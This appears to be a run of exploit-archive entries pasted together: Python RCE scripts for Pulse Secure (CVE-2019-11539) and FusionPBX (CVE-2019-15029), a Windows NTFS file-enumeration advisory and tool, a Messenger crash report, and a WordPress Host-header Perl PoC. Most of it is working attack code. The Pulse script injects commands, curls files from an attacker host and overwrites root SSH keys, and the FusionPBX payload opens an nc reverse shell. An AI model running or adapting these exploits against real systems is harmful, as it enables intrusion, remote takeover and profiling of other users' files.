      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end
end

#!/usr/bin/python
#
# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 09/05/2019
# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: linux
# CVE : CVE-2019-11539
#
# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
#
# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
# You will need your own configuration and authorized_keys files.
#
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
#
# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization.
# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free.
#
# Imports
import requests
import urllib
from bs4 import BeautifulSoup

# Host information
host = '' # Host to exploit
login_url = '/dana-na/auth/url_admin/login.cgi' # Login page
CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump
CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code

# Login Credentials
user = 'admin' # Default Username
password = 'password' # Default Password

# Necessary for Curl
downloadHost = '' # IP or FQDN for host running webserver
port = '' # Port where web service is running. Needs to be a string, hence the quotes.

# Proxy Configuration
# Uncomment if you need to use a proxy or for debugging requests
proxies = {
    # 'http': 'http://127.0.0.1:8080',
    # 'https': 'http://127.0.0.1:8080',
}

# Headers for requests
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded',
}

# Cookies to send with request
cookies = {
'lastRealm':'Admin%20Users',
'DSSIGNIN':'url_admin',
'DSSignInURL':'/admin/',
'DSPERSISTMSG':'',
}

# Data for post request
loginData = {
'tz_offset': 0,
'username': user,
'password': password,
'realm': 'Admin Users',
'btnSubmit': 'Sign In',
}

s = requests.Session() # Sets up the session
s.proxies = proxies # Sets up the proxies

# Disable Warnings from requests library
requests.packages.urllib3.disable_warnings()

# Administrator Login logic
# Probably wouldn't have figured this out without help from @buffaloverflow
def adminLogin():
    global xsAuth
    global _headers

    # Send the intial request
    r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)

    print('[#] Logging in...') # Self Explanatory
    r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request
    print('[#] Sent Login Request...')

    # Login Logic
    if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""):
        referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer
        r = s.get(referer, verify=False) # Sends a get request
        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
        FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr
        print('[#] Grabbing xsauth...')
        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
        print('[!] Got xsauth: ' + xsAuth) # Self Explanatory
        data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page
        _headers = headers # Sets the headers
        _headers.update({'referer':referer}) # Updates the headers
        r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request

    print('[+] Logged in!') # Self Explanatory

# Command injection logic
def cmdInject(command):
    r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
    if r.status_code == 200:
        soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
        xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
        payload = {
'a':'td',
'chkInternal':'On',
'optIFInternal':'int0',
'pmisc':'on',
'filter':'',
'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command,
'toggle':'Start+Sniffing',
'xsauth':xsAuth
        }
        # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
        DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")}
        # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run
        # Sends the get request to overwrite the template
        r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
        # Sends the get request to execute the code
        r = s.get('https://' + host + CommandExecURL, verify=False)

# Main logic
if __name__ == '__main__':
    adminLogin()
    try:
        print('[!] Starting Exploit')
        print('[*] Opening Firewall port...')
        cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port
        print('[*] Downloading Necessary Files....')
        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config
        cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys
        print('[*] Backing up Files...')
        cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config
        cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys
        print('[*] Overwriting Old Files...')
        cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config
        cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys
        print('[*] Restarting SSHD...')
        cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP
        print('[!] Done Exploiting the system.')
        print('[!] Please use the following command:')
        print('[!] ssh -p6667 root@%s') %(host)
    except Exception as e:
        raise

#!/usr/bin/python3

'''
# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup

# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 6:
    print(len(sys.argv))
    print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
    print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")

    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]


request = requests.session()

login_info = {
"username": username,
"password": password
}

login_request = request.post(
    url+"/core/user_settings/user_dashboard.php",
     login_info, verify=False
 )


if "Invalid Username and/or Password" not in login_request.text:
    print("[+] Logged in successfully")
else:
    print("[+] Error with creds")

service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
    # the service name you want to create
"service_name":"PwnedService3",
"service_type":"pid",
"service_data":"1",

    # this value contains the payload , you can change it as you want
"service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
"service_cmd_stop":"stop",
"service_description":"desc",
"submit":"Save"
}

request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)

soup = BeautifulSoup(html_page.text, "lxml")

for a in soup.find_all(href=True):
    if "PwnedService3" in a:
        sid = a["href"].split("=")[1]
        break

service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
[+] ISR: ApparitionSec          


[Vendor]
www.microsoft.com


[Product]
Windows NTFS

NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.


[Vulnerability Type]
Privileged File Access Enumeration


[CVE Reference]
N/A


[Security Issue]
Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name.
This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension
or have a "." (dot) as part of the file or folder name.

Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames
of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal
those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities.

Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename
are always issued the expected "Access is denied" system error message.

However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning:
"The system cannot find the file".

This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file".

Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not.
This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files
exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not.

However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible
users file on the command line much like calling a program and pressing the enter key.

After the Win32 API function CreateFile is called an it returns either:

1) "The system cannot find the file"
2) "Access is denied"

c:\>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
The system cannot find the file <==== DOES NOT EXIST

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
Access is denied.  <===== EXISTS

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
The system cannot find the file <==== DOES NOT EXIST

c:\>C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever 
Access is denied.  <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME

From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe 
or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass.

Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide
processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is
how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the
malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights.

Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd.
However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages.

Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing
files or folders in the local file system.


Tested successfully Win7/10


[Exploit/POC]
"NtFileSins.py"

from subprocess import Popen, PIPE
import sys,argparse,re

# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges.
#               2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message"  OR  "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#=====================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool.      #
# By John Page (aka hyp3rlinx)                                        #
# Apparition Security                                                 #
#=====================================================================#

BANNER='''
    _   _______________ __    _____ _           
   / | / /_  __/ ____(_) /__ / ___/(_)___  _____
  /  |/ / / / / /_  / / / _ \\__ \ / / __ \/ ___/
 / /|  / / / / __/ / / /  __/__/ / / / / (__  ) 
/_/ |_/ /_/ /_/   /_/_/\___/____/_/_/ /_/____/                                                                                        
 By hyp3rlinx
 ApparitionSec                                                                                                                     
'''

sin_cnt=0
found_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"

USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]

APPDATA_DIR=["AppData/Local/Temp"]

EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])

REPORT="NtFileSins_Log.txt"

def usage():
    print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
    print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
    print '-u victim -a "<name.ext>"'
    print "-u victim -d Downloads -a <name.ext> -s"
    print '-u victim -d Contacts -a "Mike N.contact"'
    print "-u victim -a APT.txt -b -n"
    print "-u victim -d Desktop/MyFiles -a  <.name>"
    print "-u victim -d Searches -a <name>.search-ms"
    print "-u victim -d . -a <name.ext>"
    print "-u victim -d desktop -a inverted-crosses.mp3 -b"
    print "-u victim -d Downloads -a APT.exe -b"
    print "-u victim -f list_of_files.txt"
    print "-u victim -f list_of_files.txt -b -s"
    print "-u victim -f list_of_files.txt -x .txt"
    print "-u victim -d desktop -f list_of_files.txt -b"
    print "-u victim -d desktop -f list_of_files.txt  -x .rar"

def parse_args():
    parser.add_argument("-u", "--user", help="Privileged user target")
    parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
    parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
    parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
    parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
    parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
    parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
    parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
    parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
    parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
    parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
    return parser.parse_args()


def access(j):
    result=""
    try:
        p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
        stderr,stdout = p.communicate()
        result = stdout.strip()
    except Exception as e:
        #print str(e)
        pass
    return result


def artifacts_from_file(artifacts_file, bflag, specific_ext):
    try:
        f=open(artifacts_file, "r")
        for a in f:
            idx = a.rfind(".")
            a = a.strip()
            if a != "":
                if specific_ext:
                    if idx==-1:
                        a = a + specific_ext
                    else:
                        #replace existing ext
                        a = a[:idx] + specific_ext
                if bflag:
                    ARTIFACTS_SET.add(a)
                else:
                    ARTIFACTS_SET.add(a)
        f.close()
    except Exception as e:
        print str(e)
        exit()


def save():
    try:
        f=open(REPORT, "w")
        for j in found_set:
            f.write(j+"\n")
        f.close()
    except Exception as e:
        print str(e)


def recon_msg(s):
    if s == 0:
        return "Access is denied."
    else:
        return "\t[*] Artifact exists ==>"


def echo_results(args, res, x, i):
    global sin_cnt
    if res=="":
        print "\t[!] No NTFS message, you must already be admin, then this script is not required."
        exit()
    if "not recognized as an internal or external command" in res:
        print "\t[!] You must target users with higher privileges than yours."
        exit()
    if res != recon_msg(0):
        if args.verbose:
            print "\t"+res
        else:
            if args.notfound:
                print "\t[-] not found: " + x +"/"+ i
    else:
        sin_cnt += 1
        if args.save:
            found_set.add(x+"/"+i)
        if args.verbose:
            print recon_msg(1)+ x+"/"+i
            print "\t"+res
        else:
            print recon_msg(1)+ x+"/"+i


def valid_artifact_name(sin,args):
    idx = "." in sin
    if re.findall(r"[/\\*?:<>|]", sin):
        print "\t[!] Skipping: disallowed file name character."
        return False
    if not idx and not args.built_in_ext and not args.specific_ext:
        print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
        print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
    if not args.built_in_ext:
        if sin[-1] == ".":
            print "\t[!] Skipping: "+sin+" non valid file name."
            return False
    return True


def search_missing_ext(path,args,i):
    for x in path:
        for e in EXTS:
            res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
            echo_results(args, res, x, i+e)



def ntsins(path,args,i):
    if i.rfind(".")==-1:
        search_missing_ext(path,args,i)
        i=""
    for x in path:
        if i != "":
            if args.built_in_ext:
                for e in EXTS:
                    res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
                    echo_results(args, res, x, i+e)
            elif args.specific_ext:
                idx = i.rfind(".")
                if idx == -1:
                    i = i + "."
                else:
                    i = i[:idx] + args.specific_ext
            res = access(ROOTDIR+args.user+"/"+x+"/"+i)
            echo_results(args, res, x, i)


def search(args):
    print "\tSearching...\n"
    global ROOTDIR, USER_DIRS, ARTIFACTS_SET

    if args.artifact:
        ARTIFACTS_SET = set([args.artifact])

    for i in ARTIFACTS_SET:
        idx = i.rfind(".") + 1
        if idx and args.built_in_ext:
            i = i[:idx -1:None]
        if len(i) > 0 and i != None: 
            if valid_artifact_name(i,args):
                #specific user dir search
                if args.directory:
                    single_dir=[args.directory]
                    ntsins(single_dir,args,i)
                #search appdata dirs
                elif args.appdata:
                    ntsins(APPDATA_DIR,args,i)
                #all default user dirs
                else:
                    ntsins(USER_DIRS,args,i)

    if args.save and len(found_set) != 0:
        save()


def check_dir_input(_dir):
    if len(re.findall(r":", _dir)) != 0:
        print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
        return False
    return True


def main(args):

    if len(sys.argv)==1:
        parser.print_help(sys.stderr)
        sys.exit(1)

    if args.examples:
        usage()
        exit()

    if not args.user:
        print "[!] No target user specified see Help -h"
        exit()

    if args.appdata and args.directory:
        print "[!] Multiple search directories supplied see Help -h"
        exit()

    if args.specific_ext:
        if  "." not in args.specific_ext:
            print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
            exit()

    if args.artifact and args.artifacts_from_file:
        print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
        exit()

    if args.built_in_ext and args.specific_ext:
        print "\t[!] Both specific and built-in extensions supplied, use only one."
        exit()

    if args.specific_ext and not args.artifacts_from_file:
        print "\t[!] -x to be used with -f flag only see Help -h."
        exit()

    if args.artifact:
        if args.artifact.rfind(".")==-1:
            print "\t[!] Artifacts must contain a .ext or will result in false positives."
            exit()

    if args.directory:
        if not check_dir_input(args.directory):
            exit()

    if args.artifacts_from_file:
        artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)

    if not args.artifact and not args.artifacts_from_file:
        print "[!] Exiting, no artifacts supplied see Help -h"
        exit()
    else:
        search(args)

    print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"

    if not args.notfound:
        print "\tuse -n to display unfound enumerated files."
    if not args.built_in_ext:
        print "\tfor extra search coverage try -b flag or targeted artifact search -a."

if __name__ == "__main__":
    print BANNER
    parser = argparse.ArgumentParser()
    main(parse_args())




[POC Video URL]
https://www.youtube.com/watch?v=rm8kEbewqpI



[Network Access]
Remote/Local



[Severity]
Low


[Disclosure Timeline]
Vendor Notification: July 29, 2019
MSRC "does not meet the bar for security servicing" : July 29, 2019
September 5, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Facebook Messenger Remote Denial of Service Vulnerability Report by Social Engineering Neo.


Affected Platforms: -
Android ≤9
IOS ≤11
Messenger
Messenger Lite


Tested On: -
Android 6 & 7
IOS 11
Messenger (build 228.1.0.10.116)
Messenger Lite (build 65.0.1.18.236)


Class: -
Denial of Service.


Summary: -
All versions of Messenger Lite and Multiple Versions of Messenger are susceptible to a Remote Denial of Service Vulnerability.


Short Description: -
A user can remotely crash a user’s Messenger application by sending a message containing a single character.


Long Description: -
'ATTACKER' sends a single soft hyphen to 'VICTIM'
Upon opening the message, the Messenger application on 'VICTIM' device crashes when loading the single character.


Proof of Concept: -
####
Tested on Latest Version of Messenger Lite on Android 6

'ATTACKER' send single soft hyphen to 'VICTIM'
'VICTIM' open message sent by 'ATTACKER'
####

VIDEO: -   https://youtu.be/En1npDpgv_o


Expected Result: -
It shouldn't be possible to remotely crash the application on a remote user’s device.


Observed Result: -
Application remotely crashes upon loading message.


Our Recommendation:
Change the way soft hyphens are loaded in the application.


CVSS v3 Vector: -
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H/E:F/RL:O/RC:R/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:N/MI:L/MA:H

CVSS Base Score: - 8.2
Impact Subscore: - 4.2
Exploitability Subscore: - 3.9
CVSS Temporal Score: - 7.3
CVSS Environmental Score: - 7.3
Modified Impact Subscore: - 4.2
Overall CVSS Score: - 7.3


CVSS v2 Vector: -
AV:N/AC:L/Au:N/C:N/I:P/A:C/E:F/RL:OF/RC:UR/CDP:LM/TD:M/CR:ND/IR:ND/AR:ND

CVSS Base Score: - 8.5
Impact Subscore: - 7.8
Exploitability Subscore: - 10.0
CVSS Temporal Score: - 6.7
CVSS Environmental Score: - 5.7
Modified Impact Subscore: - 7.8
Overall CVSS Score: - 5.7


TIMELINE: - Discovery      2017
        : - Initial Report 23rd August 2019
        : - Case Opened    23rd August 2019
        : - Added Detail   24th August 2019    *Public Disclosure Date: - Sep 18th 2019 UTC -08:00 (25 days from initial report)*
        : - Added Detail   27th August 2019
        : - Response       27th August 2019
        : - Added Detail   27th August 2019
        : - Response       29th August 2019
        : - Added Detail   29th August 2019
        : - Response       1st September 2019
        : - Added Detail   1st September 2019
        : - Case Closed    5th September 2019  *PATCH RELEASED PUBLICLY*
        : - Added Detail   5th September 2019  *Public Disclosure Date: - Jul 6th 2019 UTC -08:00 (24 hours from patch)*

        : - We thank the Facebook Security team for their quick patch.

#!/usr/bin/perl -w
#
#  Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#  Type: Remote
#  Risk: High
#
#  Solution:
#  Set security headers to web server and no-cache for Cache-Control
#  
#  Simple Attack Scenarios:
#  
#     o  This attack can bypass Simple WAF to access restricted content on the web server,
#        something like phpMyAdmin;
#
#     o  This attack can deface the vulnerable Wordpress website with content from the default vhost;
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#       # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#  # ====================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => default-vhost.com
#  # >  User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Connection => close
#  # <  Date => Fri, 06 Sep 2019 11:39:43 GMT
#  # <  Location => https://default-vhost.com/
#  # <  Server => nginx
#  # <  Content-Type => text/html; charset=UTF-8
#  # <  Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
#  # <  Client-Peer => 13.37.13.37:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
#  # <  Client-SSL-Cert-Subject => /CN=default-vhost.com
#  # <  Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Client-Transfer-Encoding => chunked
#  # <  Strict-Transport-Security => max-age=31536000;
#  # <  X-Powered-By => PHP/7.3.9
#  # <  X-Redirect-By => WordPress
#  # ====================================================================================
#
#
# 
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'default-vhost.com';


say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
if ($host !~ m/^http/){
say  "# e.g. perl $0 https://target:port/ default-vhost.com";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
say "# ====================================================================================";